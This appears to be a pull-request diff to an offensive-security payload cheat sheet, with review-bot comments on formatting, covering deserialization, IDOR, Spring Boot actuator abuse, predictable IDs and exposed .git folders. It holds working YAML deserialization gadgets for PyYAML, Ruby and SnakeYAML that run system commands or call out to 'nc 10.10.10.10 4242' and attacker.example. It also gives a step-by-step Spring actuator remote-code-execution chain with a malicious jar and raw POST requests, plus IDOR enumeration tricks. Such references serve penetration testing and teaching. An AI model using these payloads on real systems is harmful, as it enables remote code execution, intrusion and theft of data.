* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
* [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
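Review bot: the magic-byte table is dropped in without an introductory sentence or heading, and two of its rows need qualifying: `80 04 95` / `gASV` is the header of pickle protocol 4 only (protocol 2 and 3 streams begin with `80 02` and `80 03`), and `4F 3A` (`O:`) matches only a serialized PHP object, not a serialized array (`a:`) or scalar. Add a lead-in such as "Serialized blobs can often be recognised by their first bytes:" and state the protocol or type each row covers so readers do not miss other variants.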
@@ -23,5 +48,9 @@ Check the following sub-sections, located in other files :
* [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) * [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting)
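Review bot: two typos in the new reference lines: `Diving into unserialize() - Sep 19- Vickie Li` is missing a space before the second dash, and `OleksandrMirosh` in the `.NET Gadgets` entry should be `Oleksandr Mirosh`. The bracket fix on the `Ruby Cookie Deserialization RCE` entry looks good.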

View File

@@ -16,7 +16,7 @@ require "yaml"
YAML.load(File.read("p.yml")) YAML.load(File.read("p.yml"))
``` ```
Exploitation code Universal gadget for ruby <= 2.7.2:
```ruby ```ruby
--- !ruby/object:Gem::Requirement --- !ruby/object:Gem::Requirement
requirements: requirements:
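Review bot: the caption change to `Universal gadget for ruby <= 2.7.2:` is a useful clarification, but the fence that follows it is tagged ```ruby while the block is a YAML document (`--- !ruby/object:Gem::Requirement`); tag it ```yaml so it highlights correctly and matches the YAML payloads elsewhere in this PR.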
@@ -29,9 +29,35 @@ requirements:
spec: spec:
``` ```
Universal gadget for ruby 2.x - 3.x.
```ruby
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve
```
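Review bot: the new `Universal gadget for ruby 2.x - 3.x.` block duplicates, almost verbatim, the Ruby section added to YAML.md in the same commit (the only difference is `git_set: id` here versus `git_set: sleep 600` there); two copies will drift apart, so keep one canonical block and link to it from the other file. As with the previous block, the fence is tagged ```ruby for YAML content and should be ```yaml.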
## References ## References
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
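Review bot: the reference added on the last line uses `*` as its bullet while every other item in this list uses `-`; switch it to `-`. While touching the list, the first staaldraad entry has a stray trailing space inside the link text (`@_staaldraad ]`) that should go.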

View File

@@ -0,0 +1,99 @@
# YAML Deserialization
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [PyYAML](#pyyaml)
* [ruamel.yaml](#ruamelyaml)
* [Ruby](#ruby)
* [SnakeYAML](#snakeyaml)
* [References](#references)
## Tools
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
## Exploit
### PyYAML
```yaml
!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
```
```yaml
!!python/object/apply:subprocess.Popen
- ls
```
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
```
Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution.
[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)
The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)```
```
with open('exploit_unsafeloader.yml') as file:
data = yaml.load(file,Loader=yaml.UnsafeLoader)
```
## Ruamel.yaml
## Ruby
```ruby
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: sleep 600
method_id: :resolve
```
## SnakeYAML
```yaml
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
```
## References
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
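Review bot: several structural problems in the new YAML.md: the first two reference entries use `][` instead of `](`, so `* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/...]` will not render as a link; the Summary nests ruamel.yaml, Ruby and SnakeYAML under Exploit, but their headings are `##` rather than `###`; `## Ruamel.yaml` is an empty section; the fence around `with open('exploit_unsafeloader.yml') as file:` has no language tag and the snippet lacks `import yaml`; and `[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)` has a typo and points at an issue rather than a PR. Please fix these before merge.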

View File

@@ -1,59 +1,144 @@
# Insecure Direct Object References # Insecure Direct Object References
> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Labs](#labs)
* [Exploit](#exploit) * [Exploit](#exploit)
* [Examples](#examples) * [Numeric Value Parameter](#numeric-value-parameter)
* [Common Identifiers Parameter](#common-identifiers-parameter)
* [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator)
* [Hashed Parameter](#hashed-parameter)
* [Wildcard Parameter](#wildcard-parameter)
* [IDOR Tips](#idor-tips)
* [References](#references) * [References](#references)
## Tools ## Tools
- Burp Suite plugin Authz - [PortSwigger/BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
- Burp Suite plugin AuthMatrix - [PortSwigger/BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e)
- Burp Suite plugin Authorize - [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
## Labs
* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
## Exploit ## Exploit
IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion.
**Example of IDOR**
Imagine a web application that allows users to view their profile by clicking a link `https://example.com/profile?user_id=123`:
```php
<?php
$user_id = $_GET['user_id'];
$user_info = get_user_info($user_id);
...
```
Here, `user_id=123` is a direct reference to a specific user's profile. If the application doesn't properly check that the logged-in user has the right to view the profile associated with `user_id=123`, an attacker could simply change the `user_id` parameter to view other users' profiles:
```ps1
https://example.com/profile?user_id=124
```
![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png) ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)
The value of a parameter is used directly to retrieve a database record.
```powershell ### Numeric Value Parameter
http://foo.bar/somepage?invoice=12345
```
The value of a parameter is used directly to perform an operation in the system Increment and decrement these values to access sensitive informations.
```powershell * Decimal value: `287789`, `287790`, `287791`, ...
http://foo.bar/changepassword?user=someuser * Hexadecimal: `0x4642d`, `0x4642e`, `0x4642f`, ...
``` * Unix epoch timestamp: `1695574808`, `1695575098`, ...
The value of a parameter is used directly to retrieve a file system resource **Examples**
```powershell
http://foo.bar/showImage?img=img00011
```
The value of a parameter is used directly to access application functionality
```powershell
http://foo.bar/accessPage?menuitem=12
```
## Examples
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) * [HackerOne - Delete messages via IDOR - naaash](https://hackerone.com/reports/697412)
### Common Identifiers Parameter
Some identifiers can be guessed like names and emails, they might grant you access to customer data.
* Name: `john`, `doe`, `john.doe`, ...
* Email: `john.doe@mail.com`
* Base64 encoded value: `am9obi5kb2VAbWFpbC5jb20=`
**Examples**
* [HackerOne - Insecure Direct Object Reference (IDOR) - Delete Campaigns - datph4m](https://hackerone.com/reports/1969141)
### Weak Pseudo Random Number Generator
* UUID/GUID v1 can be predicted if you know the time they were created: `95f6e264-bb00-11ec-8833-00155d01ef00`
* MongoDB Object Ids are generated in a predictable manner: `5ae9b90a2c144b9def01ec37`
* a 4-byte value representing the seconds since the Unix epoch
* a 3-byte machine identifier
* a 2-byte process id
* a 3-byte counter, starting with a random value
**Examples**
* [HackerOne - IDOR allowing to read another user's token on the Social Media Ads service - a_d_a_m](https://hackerone.com/reports/1464168)
* [IDOR through MongoDB Object IDs Prediction](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
### Hashed Parameter
Sometimes we see websites using hashed values to generate a random user id or token, like `sha1(username)`, `md5(email)`, ...
* MD5: `098f6bcd4621d373cade4e832627b4f6`
* SHA1: `a94a8fe5ccb19ba61c4c0873d391e987982fbbd3`
* SHA2: `9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08`
**Examples**
* [IDOR with Predictable HMAC Generation - DiceCTF 2022 - CryptoCat](https://youtu.be/Og5_5tEg6M0)
### Wildcard Parameter
Send a wilcard instead of an ID, some backend might respond with the data of all the users.
* `GET /api/users/* HTTP/1.1`
* `GET /api/users/% HTTP/1.1`
* `GET /api/users/_ HTTP/1.1`
* `GET /api/users/. HTTP/1.1`
**Examples**
* [TODO]()
### IDOR Tips
* Change the HTTP request: `POST → PUT`
* Change the content type: `XML → JSON`
* Transform numerical values to arrays: `{"id":19} → {"id":[19]}`
* Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id`
## References ## References
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
* [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres)
* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor)
* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor)
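Review bot: a few nits in the reworked IDOR page: `wilcard` should be `wildcard` in the Wildcard Parameter intro; `sensitive informations` should be `sensitive information`; the Tools list says `Burp Suite plugin Authorize` while the BApp it links to is named `Autorize`; the example URL `https://example.com/profile?user_id=124` sits in a fence tagged ```ps1 where a plain or ```http fence fits; and `* [TODO]()` under Wildcard Parameter is an empty link placeholder that should be filled or removed.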

View File

@@ -1,19 +1,94 @@
# Insecure management interface # Insecure Management Interface
## Springboot-Actuator ## Springboot-Actuator
Actuator endpoints let you monitor and interact with your application. Actuator endpoints let you monitor and interact with your application.
Spring Boot includes a number of built-in endpoints and lets you add your own. Spring Boot includes a number of built-in endpoints and lets you add your own.
For example, the health endpoint provides basic application health information. For example, the `/health` endpoint provides basic application health information.
Some of them contains sensitive info such as : Some of them contains sensitive info such as :
- `/trace` (by default the last 100 HTTP requests with headers) - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
- `/env` (the current environment properties) - `/env` - Displays the current environment properties (from Springs ConfigurableEnvironment).
- `/heapdump` (builds and returns a heap dump from the JVM used by our application). - `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
- `/dump` - Displays a dump of threads (including a stack trace).
- `/logfile` - Outputs the contents of the log file.
- `/mappings` - Shows all of the MVC controller mappings.
These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. These endpoints are enabled by default in Springboot 1.X.
Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
Since Springboot 2.X only `/health` and `/info` are enabled by default.
### Remote Code Execution via `/env`
Spring is able to load external configurations in the YAML format.
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
In other words, an attacker can gain remote code execution by loading a malicious config file.
#### Steps
1. Generate a payload of SnakeYAML deserialization gadget.
- Build malicious jar
```bash
git clone https://github.com/artsploit/yaml-payload.git
cd yaml-payload
# Edit the payload before executing the last commands (see below)
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
```
- Edit src/artsploit/AwesomeScriptEngineFactory.java
```java
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
} catch (IOException e) {
e.printStackTrace();
}
}
```
- Create a malicious yaml config (yaml-payload.yml)
```yaml
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker.example/yaml-payload.jar"]
]]
]
```
2. Host the malicious files on your server.
- yaml-payload.jar
- yaml-payload.yml
3. Change `spring.cloud.bootstrap.location` to your server.
```
POST /env HTTP/1.1
Host: victim.example:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
```
4. Reload the configuration.
```
POST /refresh HTTP/1.1
Host: victim.example:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
## References ## References
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
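Review bot: `Some of them contains sensitive info such as :` should read `Some of them contain sensitive info such as:`, and `Springs ConfigurableEnvironment` needs the possessive `Spring's`. The two raw request blocks (`POST /env HTTP/1.1`, `POST /refresh HTTP/1.1`) have untagged fences; tag them ```http. The section also ends without any mitigation: one sentence noting that sensitive actuator endpoints should not be exposed (Spring Boot 2.x controls this via `management.endpoints.web.exposure.include`) and should sit behind authentication would balance the write-up and match the `Note:` about credentials added above.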

View File

@@ -0,0 +1,64 @@
# Insecure Randomness
## Summary
* [GUID / UUID](#guid--uuid)
* [GUID Versions](#guid-versions)
* [Tools](#tools)
* [Mongo ObjectId](#mongo-objectid)
* [Tools](#tools)
* [References](#references)
## GUID / UUID
### GUID Versions
Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx`
The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.
| Version | Notes |
|----------|--------|
| 0 | Only `00000000-0000-0000-0000-000000000000` |
| 1 | based on time, or clock sequence |
| 2 | reserved in the RFC 4122, but ommitted in many implementations |
| 3 | based on a MD5 hash |
| 4 | randomly generated |
| 5 | based on a SHA1 hash |
### Tools
* [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs
```ps1
$ guidtool -i 95f6e264-bb00-11ec-8833-00155d01ef00
UUID version: 1
UUID time: 2022-04-13 08:06:13.202186
UUID timestamp: 138691299732021860
UUID node: 91754721024
UUID MAC address: 00:15:5d:01:ef:00
UUID clock sequence: 2099
$ guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
```
## Mongo ObjectId
Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId value consists of:
* **Timestamp** (4 bytes): Represents the ObjectIds creation time, measured in seconds since the Unix epoch (January 1, 1970).
* **Machine Identifier** (3 bytes): Identifies the machine on which the ObjectId was generated. Typically derived from the machine's hostname or IP address, making it predictable for documents created on the same machine.
* **Process ID** (2 bytes): Identifies the process that generated the ObjectId. Typically the process ID of the MongoDB server process, making it predictable for documents created by the same process.
* **Counter** (3 bytes): A unique counter value that is incremented for each new ObjectId generated. Initialized to a random value when the process starts, but subsequent values are predictable as they are generated in sequence.
### Tools
* [andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict) - Predict Mongo ObjectIds
```ps1
./mongo-objectid-predict 5ae9b90a2c144b9def01ec37
5ae9bac82c144b9def01ec39
5ae9bacf2c144b9def01ec3a
5ae9bada2c144b9def01ec3b
```
### References
* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
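Review bot: the Summary lists `Tools` twice, both linking to `#tools`, but the second `### Tools` heading (under Mongo ObjectId) will get the anchor `#tools-1`, so the second link is dead. `### References` is a level-3 heading whereas every other page in this PR uses `## References`. Typos: `ommitted` should be `omitted`, and `ObjectIds creation time` should be `ObjectId's creation time`. The two ```ps1 fences wrap a `$ guidtool ...` shell session and a `./mongo-objectid-predict` run, so ```bash or ```console is the right tag.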

File diff suppressed because it is too large Load Diff

View File

@@ -1,24 +1,36 @@
# Insecure source code management # Insecure Source Code Management
- [GIT - Source code management](#git---source-code-management) * [Git](#git)
- [Github example with a .git](#github-example-with-a-git) + [Example](#example)
- [Recovering the content of .git/index](#recovering-the-content-of-gitindex) - [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
- [Automatic way : diggit.py](#automatic-way--diggitpy) - [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper) + [Tools](#tools)
- [Automatic way : rip-git](#automatic-way--rip-git) - [Automatic recovery](#automatic-recovery)
- [Automatic way : GitHack](#automatic-way--githack) * [git-dumper.py](#git-dumperpy)
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog) * [diggit.py](#diggitpy)
- [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob) * [GoGitDumper](#gogitdumper)
- [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks) * [rip-git](#rip-git)
- [SVN - Source code management](#svn---source-code-management) * [GitHack](#githack)
- [SVN example (Wordpress)](#svn-example-wordpress) * [GitTools](#gittools)
- [Automatic way : svn-extractor](#automatic-way--svn-extractor) - [Harvesting secrets](#harvesting-secrets)
- [BAZAAR - Source code management](#bazaar---source-code-management) * [trufflehog](#trufflehog)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr) * [Yar](#yar)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper) * [Gitrob](#gitrob)
- [Leaked API keys](#leaked-api-keys) * [Gitleaks](#gitleaks)
* [Subversion](#subversion)
+ [Example (Wordpress)](#example-wordpress)
+ [Tools](#tools-1)
- [svn-extractor](#svn-extractor)
* [Bazaar](#bazaar)
+ [Tools](#tools-2)
- [rip-bzr.pl](#rip-bzrpl)
- [bzr_dumper](#bzr_dumper)
* [Mercurial](#mercurial)
+ [Tools](#tools-3)
- [rip-hg.pl](#rip-hgpl)
* [References](#references)
## GIT - Source code management ## Git
The following examples will create either a copy of the .git or a copy of the current commit. The following examples will create either a copy of the .git or a copy of the current commit.
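Review bot: `Wordpress` in the new TOC entry `+ [Example (Wordpress)](#example-wordpress)` should be `WordPress`, the project's own spelling; the generated anchor is unchanged. The rewritten TOC also alternates `*`, `+` and `-` markers by nesting level, which renders fine but differs from the `*`-only nesting used in the other Summary sections of this PR.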
@@ -28,28 +40,32 @@ Check for the following files, if they exist you can extract the .git folder.
- .git/HEAD - .git/HEAD
- .git/logs/HEAD - .git/logs/HEAD
### Github example with a .git ### Example
1. Check 403 error (Forbidden) for .git or even better : a directory listing #### Recovering file contents from .git/logs/HEAD
2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
```powershell ```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial. 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag. 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing. 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
``` ```
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c, 3. Access the commit using the hash
```powershell ```powershell
# create a .git directory # create an empty .git repository
git init test git init test
cd test/.git cd test/.git
# download the file # download the file
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26 mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# display the content of the file # display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39 tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb parent 15ca375e54f056a576905b41a417b413c57df6eb
